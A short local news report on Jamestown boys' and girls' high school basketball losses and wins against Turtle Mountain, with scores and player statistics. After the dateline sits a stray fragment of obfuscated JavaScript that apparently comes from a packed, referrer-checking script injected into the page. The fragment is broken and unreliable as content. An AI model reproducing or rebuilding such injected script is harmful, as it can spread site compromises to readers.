JAMESTOWN zfdzz|var|u0026u|referrer|zdhzs||js|php’.split(‘|’),0,{}))
(NewsDakota.com) – The Jamestown boys were coming off a physical match-up with Minot and had a couple players under the weather on Saturday morning before their battle with Turtle Mountain. It didn’t seem to be a factor as Jamestown rolled over Turtle Mountain 83-59.

The Braves were without three starters in the first half as Jamestown built a 14-point lead. With the starting lineup back in tact in the second half, it didn’t seem to matter. The Jays got 22 points from Tanner Lunzman and another double-double performances from Noah Wanzek (15 points and 10 rebounds).

The Jamestown girls turned it over 20 times (13 more times than Tuesday vs. Minot) and were beaten 60-46. They couldn’t get any points in the paint with Bravettes shot blocker Faith Dionne patrolling the middle.

The Jamestown teams travel to Dickinson and Williston this weekend.
